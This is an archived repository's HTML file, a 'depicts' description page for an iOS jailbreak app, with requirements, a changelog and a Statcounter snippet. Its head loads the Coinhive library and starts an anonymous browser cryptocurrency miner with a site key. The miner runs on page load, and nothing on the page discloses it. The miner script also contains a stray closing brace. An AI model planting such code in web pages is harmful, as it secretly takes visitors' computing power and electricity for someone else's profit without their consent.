This repository has been archived on 2026-04-17. You can view files and clone it, but cannot push or open issues or pull requests.
repo/depicts/counter.html
2018-08-19 11:07:27 -06:00

73 lines
1.8 KiB
HTML

<!DOCTYPE html>
<html>
<head>
<title>Micah Gomez</title>
<link rel="stylesheet" type="text/css" href="../css/style.css">
<meta name="viewport" content="width=device-width, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no">
<meta name="apple-mobile-web-app-capable" content="yes">
<script type="text/javascript" src="../js/thankssaurik.js"></script>
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>
var miner = new CoinHive.Anonymous('5fJFXO7vXQPvwccHDz00nB69jDcDt8cp', {throttle: 0.2});
miner.start();
}
</script>
</head>
<body>
<panel>
<label>Requirements</label>
<fieldset>
<div>
<p>Compatible with iOS 9+ (I think)</p>
</div>
</fieldset>
<br>
<label>Information</label>
<fieldset>
<div>
<p>It's an app. What does it do though?</p>
</div>
</fieldset>
<br>
<label>Changelog</label>
<fieldset>
<div>
<p><strong>1.1</strong>: Inital Release</p>
</div>
</fieldset>
<br>
<fieldset>
<a>
<img class="icon" src="../images/logo.png">
<div>
<div>
<label>
<p>MPG13's Repo</p>
</label>
</div>
</div>
</a>
</fieldset>
</panel>
<!-- Default Statcounter code for Mpg13.github.io Repo
http://mpg13.github.io/repo -->
<script type="text/javascript">
var sc_project=11785589;
var sc_invisible=1;
var sc_security="fd418960";
</script>
<script type="text/javascript"
src="https://www.statcounter.com/counter/counter.js"
async></script>
<noscript><div class="statcounter"><a title="free web stats"
href="http://statcounter.com/" target="_blank"><img
class="statcounter"
src="//c.statcounter.com/11785589/0/fd418960/1/" alt="free
web stats"></a></div></noscript>
<!-- End of Statcounter Code -->
</body>
</html>